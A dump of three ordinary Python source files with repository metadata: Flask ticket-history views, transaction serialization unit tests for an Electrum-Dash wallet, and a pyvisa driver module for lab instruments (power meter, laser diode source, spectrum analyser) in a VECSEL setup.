from application import app, flicket_bp
from application.flicket.models.flicket_models import FlicketHistory, FlicketPost, FlicketTicket
from application.flicket.scripts.flicket_user_details import FlicketUserDetails
@flicket_bp.route(app.config['FLICKET'] + 'history/topic/<int:topic_id>/', methods=['GET', 'POST'])
@login_required
def flicket_history_topic(topic_id):
history = FlicketHistory.query.filter_by(topic_id=topic_id).all()
ticket = FlicketTicket.query.filter_by(id=topic_id).one()
title = gettext('Flicket - History')
return render_template(
'flicket_history.html',
title=title,
history=history,
ticket=ticket)
@flicket_bp.route(app.config['FLICKET'] + 'history/post/<int:post_id>/', methods=['GET', 'POST'])
@login_required
def flicket_history_post(post_id):
history = FlicketHistory.query.filter_by(post_id=post_id).all()
# get the ticket object so we can generate a url to link back to topic.
post = FlicketPost.query.filter_by(id=post_id).one()
ticket = FlicketTicket.query.filter_by(id=post.ticket_id).one()
title = gettext('History')
return render_template(
'flicket_history.html',
title=title,
history=history,
ticket=ticket)
| 30.729167 | 99 | 0.729492 |
f56b4d03abea2e4d94f6e59ce54b4a3de5fa58ca | 14,090 | py | Python | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | import unittest
from lib import transaction
from lib.bitcoin import TYPE_ADDRESS
from lib.keystore import xpubkey_to_address
from lib.util import bh2u, bfh
unsigned_blob = '01000000012a5c9a94fcde98f5581cd00162c60a13936ceb75389ea65bf38633b424eb4031000000005701ff4c53ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000ffffffff0140420f00000000001976a914230ac37834073a42146f11ef8414ae929feaafc388ac00000000'
signed_blob = '01000000012a5c9a94fcde98f5581cd00162c60a13936ceb75389ea65bf38633b424eb4031000000006c493046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d985012102e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6ffffffff0140420f00000000001976a914230ac37834073a42146f11ef8414ae929feaafc388ac00000000'
v2_blob = "0200000001191601a44a81e061502b7bfbc6eaa1cef6d1e6af5308ef96c9342f71dbf4b9b5000000006b483045022100a6d44d0a651790a477e75334adfb8aae94d6612d01187b2c02526e340a7fd6c8022028bdf7a64a54906b13b145cd5dab21a26bd4b85d6044e9b97bceab5be44c2a9201210253e8e0254b0c95776786e40984c1aa32a7d03efa6bdacdea5f421b774917d346feffffff026b20fa04000000001976a914024db2e87dd7cfd0e5f266c5f212e21a31d805a588aca0860100000000001976a91421919b94ae5cefcdf0271191459157cdb41c4cbf88aca6240700"
class TestBCDataStream(unittest.TestCase):
def test_compact_size(self):
s = transaction.BCDataStream()
values = [0, 1, 252, 253, 2**16-1, 2**16, 2**32-1, 2**32, 2**64-1]
for v in values:
s.write_compact_size(v)
with self.assertRaises(transaction.SerializationError):
s.write_compact_size(-1)
self.assertEqual(bh2u(s.input),
'0001fcfdfd00fdfffffe00000100feffffffffff0000000001000000ffffffffffffffffff')
for v in values:
self.assertEqual(s.read_compact_size(), v)
with self.assertRaises(transaction.SerializationError):
s.read_compact_size()
def test_string(self):
s = transaction.BCDataStream()
with self.assertRaises(transaction.SerializationError):
s.read_string()
msgs = ['Hello', ' ', 'World', '', '!']
for msg in msgs:
s.write_string(msg)
for msg in msgs:
self.assertEqual(s.read_string(), msg)
with self.assertRaises(transaction.SerializationError):
s.read_string()
def test_bytes(self):
s = transaction.BCDataStream()
s.write(b'foobar')
self.assertEqual(s.read_bytes(3), b'foo')
self.assertEqual(s.read_bytes(2), b'ba')
self.assertEqual(s.read_bytes(4), b'r')
self.assertEqual(s.read_bytes(1), b'')
class TestTransaction(unittest.TestCase):
def test_tx_unsigned(self):
expected = {
'inputs': [{
'type': 'p2pkh',
'address': 'XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P',
'num_sig': 1,
'prevout_hash': '3140eb24b43386f35ba69e3875eb6c93130ac66201d01c58f598defc949a5c2a',
'prevout_n': 0,
'pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6'],
'scriptSig': '01ff4c53ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000',
'sequence': 4294967295,
'signatures': [None],
'x_pubkeys': ['ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000']}],
'lockTime': 0,
'outputs': [{
'address': 'Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T',
'prevout_n': 0,
'scriptPubKey': '76a914230ac37834073a42146f11ef8414ae929feaafc388ac',
'type': TYPE_ADDRESS,
'value': 1000000}],
'version': 1
}
tx = transaction.Transaction(unsigned_blob)
self.assertEqual(tx.deserialize(), expected)
self.assertEqual(tx.deserialize(), None)
self.assertEqual(tx.as_dict(), {'hex': unsigned_blob, 'complete': False, 'final': True})
self.assertEqual(tx.get_outputs(), [('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T', 1000000)])
self.assertEqual(tx.get_output_addresses(), ['Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'])
self.assertTrue(tx.has_address('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'))
self.assertTrue(tx.has_address('XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P'))
self.assertFalse(tx.has_address('Xn6ZqLcuKpYoSkiXKmLMWKtoF2sNExHwjT'))
self.assertEqual(tx.serialize(), unsigned_blob)
tx.update_signatures(signed_blob)
self.assertEqual(tx.raw, signed_blob)
tx.update(unsigned_blob)
tx.raw = None
blob = str(tx)
self.assertEqual(transaction.deserialize(blob), expected)
def test_tx_signed(self):
expected = {
'inputs': [{
'type': 'p2pkh',
'address': 'XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P',
'num_sig': 1,
'prevout_hash': '3140eb24b43386f35ba69e3875eb6c93130ac66201d01c58f598defc949a5c2a',
'prevout_n': 0,
'pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6'],
'scriptSig': '493046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d985012102e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6',
'sequence': 4294967295,
'signatures': ['3046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d98501'],
'x_pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6']}],
'lockTime': 0,
'outputs': [{
'address': 'Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T',
'prevout_n': 0,
'scriptPubKey': '76a914230ac37834073a42146f11ef8414ae929feaafc388ac',
'type': TYPE_ADDRESS,
'value': 1000000}],
'version': 1
}
tx = transaction.Transaction(signed_blob)
self.assertEqual(tx.deserialize(), expected)
self.assertEqual(tx.deserialize(), None)
self.assertEqual(tx.as_dict(), {'hex': signed_blob, 'complete': True, 'final': True})
self.assertEqual(tx.serialize(), signed_blob)
tx.update_signatures(signed_blob)
self.assertEqual(tx.estimated_total_size(), 193)
self.assertEqual(tx.estimated_base_size(), 193)
self.assertEqual(tx.estimated_weight(), 772)
self.assertEqual(tx.estimated_size(), 193)
def test_estimated_output_size(self):
estimated_output_size = transaction.Transaction.estimated_output_size
self.assertEqual(estimated_output_size('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'), 34)
self.assertEqual(estimated_output_size('7WHUEVtMDLeereT5r4ZoNKjr3MXr4gqfon'), 32)
def test_errors(self):
with self.assertRaises(TypeError):
transaction.Transaction.pay_script(output_type=None, addr='')
with self.assertRaises(BaseException):
xpubkey_to_address('')
def test_parse_xpub(self):
res = xpubkey_to_address('fe4e13b0f311a55b8a5db9a32e959da9f011b131019d4cebe6141b9e2c93edcbfc0954c358b062a9f94111548e50bde5847a3096b8b7872dcffadb0e9579b9017b01000200')
self.assertEqual(res, ('04ee98d63800824486a1cf5b4376f2f574d86e0a3009a6448105703453f3368e8e1d8d090aaecdd626a45cc49876709a3bbb6dc96a4311b3cac03e225df5f63dfc', 'XjNytJHxbRZCF4s7MzaKvw4Rrf6bPRuPnW'))
def test_version_field(self):
tx = transaction.Transaction(v2_blob)
self.assertEqual(tx.txid(), "b97f9180173ab141b61b9f944d841e60feec691d6daab4d4d932b24dd36606fe")
def test_get_address_from_output_script(self):
# the inverse of this test is in test_bitcoin: test_address_to_script
addr_from_script = lambda script: transaction.get_address_from_output_script(bfh(script))
ADDR = transaction.TYPE_ADDRESS
# base58 p2pkh
self.assertEqual((ADDR, 'XeNTG4aihv1ru8xmaoiQnToSi8hLiTTNbh'), addr_from_script('76a91428662c67561b95c79d2257d2a93d9d151c977e9188ac'))
self.assertEqual((ADDR, 'XkvgWFLxVmDaVkUF8bFE2QXP4f5C2KKWEg'), addr_from_script('76a914704f4b81cadb7bf7e68c08cd3657220f680f863c88ac'))
# base58 p2sh
self.assertEqual((ADDR, '7WHUEVtMDLeereT5r4ZoNKjr3MXr4gqfon'), addr_from_script('a9142a84cf00d47f699ee7bbc1dea5ec1bdecb4ac15487'))
self.assertEqual((ADDR, '7phNpVKta6kkbP24HfvvQVeHEmgBQYiJCB'), addr_from_script('a914f47c8954e421031ad04ecd8e7752c9479206b9d387'))
#####
def _run_naive_tests_on_tx(self, raw_tx, txid):
tx = transaction.Transaction(raw_tx)
self.assertEqual(txid, tx.txid())
self.assertEqual(raw_tx, tx.serialize())
self.assertTrue(tx.estimated_size() >= 0)
def test_txid_coinbase_to_p2pk(self):
raw_tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff4103400d0302ef02062f503253482f522cfabe6d6dd90d39663d10f8fd25ec88338295d4c6ce1c90d4aeb368d8bdbadcc1da3b635801000000000000000474073e03ffffffff013c25cf2d01000000434104b0bd634234abbb1ba1e986e884185c61cf43e001f9137f23c2c409273eb16e6537a576782eba668a7ef8bd3b3cfb1edb7117ab65129b8a2e681f3c1e0908ef7bac00000000'
txid = 'dbaf14e1c476e76ea05a8b71921a46d6b06f0a950f17c5f9f1a03b8fae467f10'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_coinbase_to_p2pkh(self):
raw_tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff25033ca0030400001256124d696e656420627920425443204775696c640800000d41000007daffffffff01c00d1298000000001976a91427a1f12771de5cc3b73941664b2537c15316be4388ac00000000'
txid = '4328f9311c6defd9ae1bd7f4516b62acf64b361eb39dfcf09d9925c5fd5c61e8'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_p2pk_to_p2pkh(self):
raw_tx = '010000000118231a31d2df84f884ced6af11dc24306319577d4d7c340124a7e2dd9c314077000000004847304402200b6c45891aed48937241907bc3e3868ee4c792819821fcde33311e5a3da4789a02205021b59692b652a01f5f009bd481acac2f647a7d9c076d71d85869763337882e01fdffffff016c95052a010000001976a9149c4891e7791da9e622532c97f43863768264faaf88ac00000000'
txid = '90ba90a5b115106d26663fce6c6215b8699c5d4b2672dd30756115f3337dddf9'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_p2pk_to_p2sh(self):
raw_tx = '0100000001e4643183d6497823576d17ac2439fb97eba24be8137f312e10fcc16483bb2d070000000048473044022032bbf0394dfe3b004075e3cbb3ea7071b9184547e27f8f73f967c4b3f6a21fa4022073edd5ae8b7b638f25872a7a308bb53a848baa9b9cc70af45fcf3c683d36a55301fdffffff011821814a0000000017a9143c640bc28a346749c09615b50211cb051faff00f8700000000'
txid = '172bdf5a690b874385b98d7ab6f6af807356f03a26033c6a65ab79b4ac2085b5'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_p2pkh_to_p2pkh(self):
raw_tx = '0100000001f9dd7d33f315617530dd72264b5d9c69b815626cce3f66266d1015b1a590ba90000000006a4730440220699bfee3d280a499daf4af5593e8750b54fef0557f3c9f717bfa909493a84f60022057718eec7985b7796bb8630bf6ea2e9bf2892ac21bd6ab8f741a008537139ffe012103b4289890b40590447b57f773b5843bf0400e9cead08be225fac587b3c2a8e973fdffffff01ec24052a010000001976a914ce9ff3d15ed5f3a3d94b583b12796d063879b11588ac00000000'
txid = '24737c68f53d4b519939119ed83b2a8d44d716d7f3ca98bcecc0fbb92c2085ce'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_p2pkh_to_p2sh(self):
raw_tx = '010000000195232c30f6611b9f2f82ec63f5b443b132219c425e1824584411f3d16a7a54bc000000006b4830450221009f39ac457dc8ff316e5cc03161c9eff6212d8694ccb88d801dbb32e85d8ed100022074230bb05e99b85a6a50d2b71e7bf04d80be3f1d014ea038f93943abd79421d101210317be0f7e5478e087453b9b5111bdad586038720f16ac9658fd16217ffd7e5785fdffffff0200e40b540200000017a914d81df3751b9e7dca920678cc19cac8d7ec9010b08718dfd63c2c0000001976a914303c42b63569ff5b390a2016ff44651cd84c7c8988acc7010000'
txid = '155e4740fa59f374abb4e133b87247dccc3afc233cb97c2bf2b46bba3094aedc'
self._run_naive_tests_on_tx(raw_tx, txid)
# input: p2sh, not multisig
def test_txid_regression_issue_3899(self):
raw_tx = '0100000004328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c010000000b0009630330472d5fae685bffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c020000000b0009630359646d5fae6858ffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c030000000b000963034bd4715fae6854ffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c040000000b000963036de8705fae6860ffffffff0130750000000000001976a914b5abca61d20f9062fb1fdbb880d9d93bac36675188ac00000000'
txid = 'f570d5d1e965ee61bcc7005f8fefb1d3abbed9d7ddbe035e2a68fa07e5fc4a0d'
self._run_naive_tests_on_tx(raw_tx, txid)
def test_txid_negative_version_num(self):
raw_tx = 'f0b47b9a01ecf5e5c3bbf2cf1f71ecdc7f708b0b222432e914b394e24aad1494a42990ddfc000000008b483045022100852744642305a99ad74354e9495bf43a1f96ded470c256cd32e129290f1fa191022030c11d294af6a61b3da6ed2c0c296251d21d113cfd71ec11126517034b0dcb70014104a0fe6e4a600f859a0932f701d3af8e0ecd4be886d91045f06a5a6b931b95873aea1df61da281ba29cadb560dad4fc047cf47b4f7f2570da4c0b810b3dfa7e500ffffffff0240420f00000000001976a9147eeacb8a9265cd68c92806611f704fc55a21e1f588ac05f00d00000000001976a914eb3bd8ccd3ba6f1570f844b59ba3e0a667024a6a88acff7f0000'
txid = 'c659729a7fea5071361c2c1a68551ca2bf77679b27086cc415adeeb03852e369'
self._run_naive_tests_on_tx(raw_tx, txid)
class NetworkMock(object):
def __init__(self, unspent):
self.unspent = unspent
def synchronous_get(self, arg):
return self.unspent
| 62.622222 | 535 | 0.787935 |
92543c102b29da163c80ab76e4cfb18836472e06 | 20,647 | py | Python | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | meas/VECSELSetup.py | stefantkeller/VECSELsetup | c1740e170b54be40f7315808e451c0731a5d7f3b | [
"MIT"
] | null | null | null | #! /usr/bin/python2.7
# -*- coding: utf-8 -*-
'''
Note:
The objects defined in this file talk with actual hardware.
If you are testing a measurement routine,
whether it works in principle,
you do NOT want to import this module.
In that case, import 'VECSELSetupFake' instead.
It provides you with some mocks,
that act as if you were connecting with the hardware
(while accepting the same comands),
without the need of a working connection.
'''
from __future__ import division # old: int division (1/4=0); future: float division (1/4=0.25)
import time
import numpy as np
import visa # Virtual Instrument Software Architecture to control e.g. GPIB, RS232, USB, Ethernet
from pyvisa import constants as C
vparse = lambda s, n=1: str(s)[:-n] # visa queries end with '\n', we don't want that, hence omit the last character
class PowerMeter(object):
def __init__(self,resourcemanager,address):
_pm = resourcemanager.open_resource(address)
_pm.write(r'*CLS') # clear status; all event registers and error queue
_pm.write(r'SENSE:POWER:AUTO ON') # legacy decision, inherited from .vi document passed down for generations (...or something like thats)
_pm.write(r'SENS:AVERAGE 200') # default value
self._idn = vparse(_pm.query(r'*IDN?')) # identification code of meter itself
self._sens = vparse(_pm.query(r'SYSTEM:SENSOR:IDN?')) # id of sensor attached
self._pm = _pm
def __str__(self):
return ';'.join([self._idn,self._sens])
def get_statset(self):
# information you want to save along with the measurements (header...)
info = [r'*IDN?={0}'.format(self._idn),
r'SYSTEM:SENSOR:IDN?={0}'.format(self._sens)]
comands = [r'SENS:AVERAGE?', # averaging rate
r'SENS:CORRECTION?', # is there an attenuation factor?
#r'SENS:CORRECTION:BEAMDIAMETER?', # sensor aperture?
r'SENS:CORRECTION:WAVELENGTH?', # operation wavelength
r'SENS:POWER:REF?', # queries the delta reference value
r'SENS:POWER:REF:STATE?'] # queries the delta mode state
nonasciicmd = [r'SENS:POWER:UNIT?', # W or dBm
r'CONFIGURE?'] # query the current measurement configuration (for a power meter that should read POW)
for cmd in comands:
info.append(cmd+'={0}'.format(self._pm.query_ascii_values(cmd)[0]))
for cmd in nonasciicmd:
info.append(cmd+'={0}'.format(vparse(self._pm.query(cmd))))
return info
def average_over(self,N=1):
# according to specs 1 sample takes approx 3 ms
self._pm.write(r'SENS:AVERAGE {0}'.format(N)) # set...
read = self._pm.query_ascii_values(r'SENS:AVERAGE?')[0] # ...and ask what is newly set value
return read
def set_wavelength(self,lambd=1270):
# wavelength in nm!
self._pm.write(r'SENS:CORRECTION:WAVELENGTH {0}'.format(lambd))
read = self._pm.query_ascii_values(r'SENS:CORRECTION:WAVELENGTH?')[0]
return read
def measure(self,timed=True):
# if timed: return yields measured result AND time it needed to execute
t0 = time.time() # init for case of exception
if timed:
t0 = time.time()
return self._pm.query_ascii_values(r'MEASURE?')[0], time.time()-t0
else:
return self._pm.query_ascii_values(r'MEASURE?')[0]
class PowerSource(object):
def __init__(self,resourcemanager,address):
self._termination_char = u'\r' # \r or \n; for writing; \n seems not to work?!
self._query_delay = 0.1 # time in s between write and read when query
self._read_n = 500 # read raw so many bytes (or until machine sends nothing new anymore... 500 is way more than enough.)
self._curr_max = 0.5 # safety measure, max allowed current (in A)
self._delay_set_current = 2 # s; to wait between setting current and reading actually achieved value
_ps = resourcemanager.open_resource(address)
_ps = self._set_attributes(_ps)
self._ps = _ps
self._write('set ERR 0') # clear whatever was in the pipe before
self._write('set LMO 0') # laser mode: CW
self.set_current(0) # cancel whatever was on last at everytime we init the source
lcl = self.set_max_current(self._curr_max)
#print lcl
self._port = _ps.resource_info[0].alias
self._name = _ps.resource_info[0].resource_name
def _set_attributes(self,_ps):
# find name and flag of attributes with
# "All Programs -> National Instruments -> VISA -> VISA Interactive Control"
# here following the set attributes found with this app
# if it works: accept the black magic and don't change anything!
# if it doesn't... well... I hope you have no plans tonight
#
# the first settings come from the manual (unclear where to find it if you don't have it already, though)
# laser-electronics.de
# Laser Diode Control LDC 1000
# Operating Instructions
_ps.set_visa_attribute(C.VI_ATTR_ASRL_BAUD,9600) # baud rate
_ps.set_visa_attribute(C.VI_ATTR_ASRL_DATA_BITS,8)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_PARITY,0) # 0 := none
_ps.set_visa_attribute(C.VI_ATTR_ASRL_STOP_BITS,10) # 10 = 1
_ps.set_visa_attribute(C.VI_ATTR_TMO_VALUE,2000) # 2000 ms timeout
#_ps.query_delay = 0.1 # time in s between write and read when query
if self._termination_char == u'\r':
_ps.set_visa_attribute(C.VI_ATTR_TERMCHAR,int(u'0xD',base=16)) # end lines with \n (=0xA) or \r (=0xD)
elif termination_char == u'\n':
_ps.set_visa_attribute(C.VI_ATTR_TERMCHAR,int(u'0xA',base=16)) # end lines with \n (=0xA) or \r (=0xD)
else:
raise NotImplementedError, r'As termination character choose either \n or \r; support for custom termination is not implemented.'
_ps.write_termination = self._termination_char
_ps.set_visa_attribute(C.VI_ATTR_TERMCHAR_EN,C.VI_TRUE) # enable termchar
_ps.set_visa_attribute(C.VI_ATTR_ASRL_END_IN,C.VI_ASRL_END_TERMCHAR) # end mode for reads (not clear whether 'read' by us or the machine)
_ps.set_visa_attribute(C.VI_ATTR_IO_PROT,C.VI_PROT_NORMAL) # VI_PROT_NORMAL or VI_PROT_4882_STR
# from partially working LabView vi:
_ps.set_visa_attribute(C.VI_ATTR_ASRL_FLOW_CNTRL,C.VI_ASRL_FLOW_XON_XOFF)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_XON_CHAR,17) # no explanation for the value
_ps.set_visa_attribute(C.VI_ATTR_ASRL_XOFF_CHAR,19) # same
_ps.set_visa_attribute(C.VI_ATTR_ASRL_DTR_STATE,C.VI_STATE_UNASSERTED)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_RTS_STATE,C.VI_STATE_ASSERTED)
# attributes of unknown importance and actual meaning:
_ps.set_visa_attribute(C.VI_ATTR_DMA_ALLOW_EN,C.VI_FALSE)
_ps.set_visa_attribute(C.VI_ATTR_SUPPRESS_END_EN,C.VI_FALSE)
_ps.set_visa_attribute(C.VI_ATTR_FILE_APPEND_EN,C.VI_FALSE)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_REPLACE_CHAR,int(u'0x0',base=16)) # sth with error handling
_ps.set_visa_attribute(C.VI_ATTR_ASRL_DISCARD_NULL,C.VI_FALSE)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_BREAK_LEN,250)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_ALLOW_TRANSMIT,C.VI_TRUE)
_ps.set_visa_attribute(C.VI_ATTR_ASRL_BREAK_STATE,C.VI_STATE_UNASSERTED)
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_WIRE_MODE,C.VI_ASRL_232_DTE) # doesn't exist
# read only(?)
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_CTS_STATE,C.VI_STATE_UNASSERTED)
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_DCD_STATE,C.VI_STATE_UNASSERTED)
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_DSR_STATE,C.VI_STATE_UNASSERTED)
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_RI_STATE,C.VI_STATE_UNASSERTED)
# enable reading when received termination character
# doesn't work because device sends inconsistent combinations of \n and \r
# .. read raw!
#_ps.set_visa_attribute(C.VI_ATTR_SEND_END_EN,C.VI_TRUE)
#_ps.read_termination = self._termination_char # this machine returns random terminations: \r and \n mixed. read it "raw" and parse it from there!
#_ps.set_visa_attribute(C.VI_ATTR_ASRL_END_OUT,C.VI_ASRL_END_TERMCHAR) #end mode for writes
return _ps
def get_statset(self):
# info about the current state, stuff that belongs in a file header
info = [r'alias={0}'.format(self._port),r'resource_name={0}'.format(self._name)]
info.append(r'delay_set_current={0}'.format(self._delay_set_current))
info.append(r'LMO={0}'.format(self._query('get LMO')))
info.append(r'LCL={0}'.format(self._query('get LCL')))
info.append(r'AT1={0}'.format(self._query('get AT1').replace('\xb0','')))
info.append(r'baudrate={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_BAUD)))
info.append(r'data_bits={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_DATA_BITS)))
info.append(r'parity={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_PARITY)))
info.append(r'stop_bits={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_ASRL_STOP_BITS)))
info.append(r'timeout={0}'.format(self._ps.get_visa_attribute(C.VI_ATTR_TMO_VALUE)))
info.append(r'ERR={0}'.format(self._query('get ERR')))
# sanitize entries
info = [i.replace('\n','') for i in info]
info = [i.replace('\r','') for i in info]
return info
def __str__(self):
return ';'.join([self._port,self._name])
def _query(self,msg):
self._ps.write(unicode(msg))
time.sleep(self._query_delay)
return self._ps.read_raw(self._read_n)
def _write(self,msg):
time.sleep(self._query_delay) # give it time to process the old orders.
self._ps.write(unicode(msg))
def close(self):
# whatever you have in here must be safe!
# release lock on seial port
# write may fail but any such error is held back in the buffer;
# query('get ERR') to see
# BUT: don't query in here, 'read' MAY cause a problem
self._write('set SLC 0')
self._ps.close()
def on(self):
# open shutter to turn on laser
err = self.read_error()
state = float(self._query('get LAS'))
if state == 0 and err == 0: # device currently off
self._write('set LAS') # toggle 'on'
elif state != 1: # if not off, it's on, nothing to toggle; however, if parsing results something strange turn off power
self.close()
raise visa.VisaIOError, 'Received unexpected state while turning laser ON: {0}'.format(state)
elif err != 0:
self.close()
raise visa.VisaIOError, 'An unresolved error prevents me from turning the laser on: {0}'.format(err)
return state
def off(self):
# close shutter; turn off laser
self.set_current(0)
state = float(self._query('get LAS'))
if state == 1: # device currently on
self._write('set LAS') # toggle 'off'
elif state != 0: # if not on, it's off, nothing to toggle; however, if parsing results something strange report!
self.close()
raise visa.VisaIOError, 'Received unexpected state while turning laser OFF: {0}'.format(state)
return state
def set_max_current(self,maxcurr=0):
self._curr_max = maxcurr
self._write('set LCL {0}A'.format(maxcurr))
time.sleep(self._query_delay)
return self._query('get LCL')
def set_current(self,curr=0):
# if something goes wrong current is set to 0, the port is closed and the causing error raised again.
# returns actual current (actual and set may differ a bit.)
try:
curr = np.min([self._curr_max,curr])
# returns set value (supposed to be identical to curr)
self._write('set SLC {0}'.format(curr))
time.sleep(self._query_delay) # regular delay
time.sleep(self._delay_set_current) # give it time to actually set the current
ans = self.read_current()
return float(ans.split(' ')[0])
except Exception as e:
# whatever you have in here must be safe!
# don't call self.off(): it calls set_current(0) and goes in recusion limbo
self.close()
raise Exception, e
def read_current(self):
try:
return self._query('get ALC')
except visa.VisaIOError, e: # includes timeout errors
self.close()
raise visa.VisaIOError, e
def read_power_internal(self):
try:
return self._query('get ALP') # do NOT rely on this reading though! (from old calibration...)
except visa.VisaIOError, e: # includes timeout errors
self.close()
raise visa.VisaIOError, e
def read_error(self):
# in case error reads:
# rs232 time out error0
# I neither know where that comes from, nor how to resolve it, try a bunch of things, so far it always went away, but I don't know on behalf of which comand
# one suspicion: two write comands right after each other, hence the delay in _write()
# but if you find it again, this might not be the only source for this error...
try:
err = float(self._query('get ERR'))
return err
except ValueError, e:
# err responds with something unreadable or at least not a number.
self.close()
raise ValueError, e
def read_cooler(self):
# AT1 and AT2, however, only AT1 is active.
# returns temperature in deg C
try:
temp = self._query('get AT1') # '\n19.9 \xb0C\r'
return float(temp.split(' ')[0])
except ValueError, e:
self.close()
raise ValueError, e
'''def set_cooler(self, temp):
self._write('set ST1 {0}'.format(temp))'''
class SpectroMeter(object):
def __init__(self,resourcemanager,address):
self._query_delay = 0.1 # time in s between write and read when query
self._read_n = 4096 # read raw so many bytes (or until machine sends nothing new anymore... 4096 is overkill, but measurement does send many, many bytes)
_osa = resourcemanager.open_resource(address)
_osa = self._set_attributes(_osa)
self._osa = _osa
self._write('IP;') # Instrument preset (IP) sets all function to their preset (default) state (including: clears the error register)
self._write('LG;') # set amplitude scale to logarithmic (for linear: LN)
self._res_name = _osa.resource_info[0].resource_name
self._dev_name = vparse(self._query('ID?')) # see also CONFIG?
def _set_attributes(self,_osa):
# default values with whom it worked; set to ensure.
_osa.set_visa_attribute(C.VI_ATTR_TMO_VALUE,3000) # 3000 ms is already standard
_osa.set_visa_attribute(C.VI_ATTR_TERMCHAR_EN,C.VI_FALSE)
_osa.set_visa_attribute(C.VI_ATTR_SEND_END_EN,C.VI_TRUE)
_osa.set_visa_attribute(C.VI_ATTR_TERMCHAR,int(u'0xA',base=16)) # end lines with \n (=0xA); only option according Language Reference
_osa.set_visa_attribute(C.VI_ATTR_FILE_APPEND_EN,C.VI_FALSE)
_osa.set_visa_attribute(C.VI_ATTR_IO_PROT,1)
return _osa
def get_statset(self):
# info about the current state, stuff that belongs in a file header
info = ['resource_name={0}'.format(self._res_name),'ID?={0}'.format(self._dev_name)]
info.append('AUNITS?={0}'.format(vparse(self._query('AUNITS?')))) # DBM, DBMV, DBUV, V, W
info.append('CENTERWL?={0}'.format(vparse(self._query('CENTERWL?'))))
info.append('RB?(ResBandwidth)(nm)={0}'.format(vparse(self._query('RB?'))))
info.append('RL?(ReferenceLevel)(dBm)={0}'.format(vparse(self._query('RL?'))))
info.append('RLPOS?(PositionRL)={0}'.format(vparse(self._query('RLPOS?')))) # no idea what it means
info.append('ROFFSET?(dB)={0}'.format(vparse(self._query('ROFFSET?'))))
info.append('SENSitivity?(dBm)={0}'.format(vparse(self._query('SENS?')))) # note: results are always returned in dBm regardless of the value set by AUNITS
info.append('SPan?(nm)={0}'.format(vparse(self._query('SP?')))) # SP = wstop - wstart
return info
def __str__(self):
return ';'.join([self._res_name,self._dev_name])
